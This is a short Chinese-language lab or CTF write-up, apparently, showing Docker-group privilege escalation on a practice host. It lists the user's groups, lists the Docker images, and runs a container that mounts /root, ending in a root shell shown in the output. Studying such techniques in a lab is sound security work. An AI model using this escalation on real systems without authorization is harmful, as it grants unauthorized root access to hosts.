:::info 该漏洞和 LXD/LXD 提权差不多,都是挂载目录,但是这只是初级方法
:::
我们使用这个靶场作为举例:
在该靶场中我们的用户是一个 docker 组用户:
r00t@ultratech-prod:~$ id
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
- 我们枚举系统容器进行提权 (演示)
- 自己下载一个容器进行提权
r00t@ultratech-prod:/$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
bash latest 495d6437fc1e 3 years ago 15.8MB
r00t@ultratech-prod:/$ docker run -v /root:/mnt -it 495d6437fc1e /bin/sh
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)